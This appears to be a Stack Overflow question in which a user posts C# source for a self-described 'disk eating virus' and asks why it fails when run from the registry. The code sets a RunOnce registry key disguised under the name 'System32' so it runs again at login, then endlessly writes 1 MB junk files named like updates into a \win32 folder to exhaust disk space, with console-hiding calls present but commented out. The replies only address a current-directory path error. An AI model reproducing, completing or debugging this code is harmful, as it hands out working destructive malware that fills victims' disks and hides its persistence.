0

I have recently been attempting to make a disk eating virus to further my educational knowledge, and to further my skills in coding malicious things for whitehat hacking. Recently however the piece of code I have been working on is giving me MANY issues.

It runs perfectly when you launch the exe, but when its run from registry it gives the error. Access to path denied (C:\Windows\System32\parse.int)

I am confused as to why code is being run in the system32 location!?

__________________ CODE ________________________

using System;
using System.Runtime.InteropServices; // needed to hide console
using System.IO;
using Microsoft.Win32; // Registry

namespace diskeater
{
class Program
{
    // stuff to let me hide it
    [DllImport("kernel32.dll")]
    static extern IntPtr GetConsoleWindow();

    [DllImport("user32.dll")]
    static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);

    const int SW_HIDE = 0;

    static void Main(string[] args)
    {
        // Hide
        //var handle = GetConsoleWindow();

       // ShowWindow(handle, SW_HIDE);
        //Hidden

        const string userRoot = "HKEY_CURRENT_USER";
        const string subkey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce";
        const string keyName = userRoot + "\\" + subkey;

        Registry.SetValue(keyName, "System32", "\"" + System.Windows.Forms.Application.ExecutablePath + "\"");

        if (File.Exists("parse.int") == false) {
            var temp = File.Create("parse.int");
            temp.Close();
            var temp2 = new StreamWriter("parse.int");
            temp2.Write("0");
            temp2.Close();

        }

        try {
            string text, count;
            int i;

            try {
                var intreader = new StreamReader("parse.int");
                count = intreader.ReadToEnd();
                intreader.Close();

                text = new string('0', 1048576);

                i = Convert.ToInt32(count);

                while (true) {

                    try {

                        var sw = new StreamWriter("\\win32\\UpdateFile_" + i + ".dat");
                        sw.Write(text);
                        sw.Close();

                        var intcount = new StreamWriter("parse.int");
                        intcount.Write(i);
                        intcount.Close();

                        i++;

                        System.Threading.Thread.Sleep(250);

                    }
                    catch (DirectoryNotFoundException ex) {

                        Directory.CreateDirectory("\\win32");
                        Console.WriteLine(ex);//

                    }

                }

            } catch (FormatException ex) {
                var intcount = new StreamWriter("parse.int");
                intcount.Write("0");
                intcount.Close();

                Console.WriteLine(ex);//
            }

        } catch (FileNotFoundException ex) {
            Console.WriteLine(ex);//
        }

        System.Threading.Thread.Sleep(1000000000); //

    }
}
}
Ken White
  • 123,280
  • 14
  • 225
  • 444
Sean da Potato
  • 3
  • 4
  • It's trying to use System32 because you're not specifying a path for the file, so it's using the current directory. The current directory is apparently System32. If you don't want it to use whatever random directory is current, specify a fully qualified pathname when you work with parse.int. It's not necessary to repeat tag information in your title, or be overly dramatic with the !, or SHOUT parts of the information. We're all capable of reading here. – Ken White Jun 12 '16 at 03:06
  • +Ken White I have a question, so should i do something like string parse = System.IO.Directory.GetCurrentDirectory() + "//parse.int"; or string parse = Environment.CurrentDirectory + "//parse.int"; or would both work well?? I dont understand the other things you pointed out, like what do you mean shouts,!,title?) – Sean da Potato Jun 12 '16 at 04:41
  • @KenWhite ^ Sorry I had no clue how to tag you! IDEK If that worked! – Sean da Potato Jun 12 '16 at 15:01
  • CurrentDirectory is System32, and you clearly can't write there. You need to set it to a different directory where you have write access, or use a full path in the filename (C:\Users\SomeUser\Documents\Parse.Int). You can see what I meant if you look at the edits I made to your post in the [revision history](http://stackoverflow.com/posts/37770287/revisions). – Ken White Jun 12 '16 at 16:18

0 Answers0